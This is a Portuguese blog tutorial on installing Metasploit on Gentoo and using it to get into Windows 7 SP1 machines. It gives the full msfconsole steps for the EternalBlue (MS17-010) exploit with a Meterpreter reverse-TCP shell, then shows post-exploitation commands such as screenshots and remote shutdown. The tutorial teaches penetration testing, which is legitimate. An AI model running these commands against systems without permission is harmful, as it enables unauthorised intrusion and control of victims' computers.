Pular para o conteúdo

Como Acessar o Windows pelo Linux com Metasploit

Dica publicada em Linux / Segurança
Marcos Oliveira binbash
Hits: 5.683 Categoria: Linux Subcategoria: Segurança
  • Indicar
  • Impressora
  • Denunciar
O Viva o Linux depende da receita de anúncios para se manter. Ative os cookies aqui para nos patrocinar.
Não conseguimos carregar os anúncios. Se usa bloqueador, considere liberar o Viva o Linux para nos patrocinar.

Como Acessar o Windows pelo Linux com Metasploit

Introdução

O Metasploit é um projeto de segurança da informação que fornece informações sobre vulnerabilidades de segurança e ajuda nos testes de penetração.

É de propriedade da empresa de segurança Rapid7, de Boston, Massachusetts que possui diversos softwares (Opcode - Banco de Dados; e o Shellcode, que executa comandos de Shell Script, ...), entre eles o mais conhecido que é o Metasploit Framework, um software de código aberto uma ferramenta para explorar falhas de uma máquina remota.

O Metasploit possui 6 tipos de módulos (auxiliary, exploit, payload, post, encoder e nop). No vídeo apresentado por nós vamos utilizar o Meterpreter, que é um payload avançado.

Instalação

Existem diversas maneiras de você instalar o Metasploit Framework. Baixando diretamente pelo site metasploit.com ou pelo GitHub. Ou instalando via gerenciador de pacotes da sua distribuição, por exemplo, na distribuição que eu utilizo Gentoo basta realizar os comandos abaixo:

# emerge -a net-analyzer/metasploit \
dev-ruby/metasploit_payloads-mettle \
dev-ruby/metasploit_data_models \
dev-ruby/metasploit-payloads \
dev-ruby/metasploit-model \
dev-ruby/metasploit-credential \
dev-ruby/metasploit-concern \
app-eselect/eselect-metasploit


O comando acima irá pedir para atualizar o package.use por conta das flags, então rode o comando:

# etc-update --automode -5

E então rode o comando de instalação novamente.

Após instalação, talvez você não encontre o comando msfconsole responsável por abrir o Metasploit, então crie um link simbólico com o root ou sudo, com o comando abaixo:

# ln -s /usr/lib64/metasploit4.17/msfconsole /usr/bin/msfconsole

E pronto, o Metasploit está pronto para uso! Lembrando que em algumas distribuições já possuem o Metasploit instalado por padrão, como o Pentoo e o Kali Linux entre outras criadas especialmente para testes de invasão.

Próximo passo é rodar o Metasploit rodando o comando:

# msfconsole

Isso irá abrir o framework, e em seguida usaremos o Meterpreter para acessar o Windows, basta rodar os comandos abaixo na ordem:

use exploit/windows/smb/ms17_010_eternalblue
set RHOST NÚMERO_IP_DA_MÁQUINA_WINDOWS
set payload windows/x64/meterpreter/reverse_tcp
set LHOST NÚMERO_IP_DA_SUA_MÁQUINA
set encoder generic/none
exploit


Lembrando que esses comandos são a grosso modo e servem para Windows 7 Service Pack 1, para outras versões assista o vídeo com link abaixo que há mais detalhes para variados casos.

Após acessar você pode obter informações detalhadas do sistema com o comando sysinfo; tirar um print da tela com o comando screenshot; saber qual diretório você está com o comando pwd a saída será algo do tipo *c:\windows\system32*; desligar, reiniciar,... entre vários comando que podem ser consultado pelo comando help.

Assista ao vídeo:
O Viva o Linux depende da receita de anúncios para se manter. Ative os cookies aqui para nos patrocinar.
Não conseguimos carregar os anúncios. Se usa bloqueador, considere liberar o Viva o Linux para nos patrocinar.

Links Úteis


Abraços!

O Viva o Linux depende da receita de anúncios para se manter. Ative os cookies aqui para nos patrocinar.
Não conseguimos carregar os anúncios. Se usa bloqueador, considere liberar o Viva o Linux para nos patrocinar.

Como Instalar o Gentoo Linux

O que fazer após instalar o Gentoo Linux

OpenBSD em Dual Boot com Linux (Partição Única)

Como Instalar o Debian Remotamente via SSH [Vídeo]

Como compilar o kernel do zero no Gentoo Linux

ForkBomb: Corrigindo essa falha de segurança no Linux

Instalar e configurar BackupPc no Fedora 12

Firewall (Iptables + Squid) no Debian Squeeze

PKI na Prática: Criando CA e Certificado Wildcard (Automatizado)

Squid - Bloqueio de acesso ao Facebook para um único host através do MAC address

Nenhum comentário foi encontrado.

Contribuir com comentário

Entre na sua conta para comentar.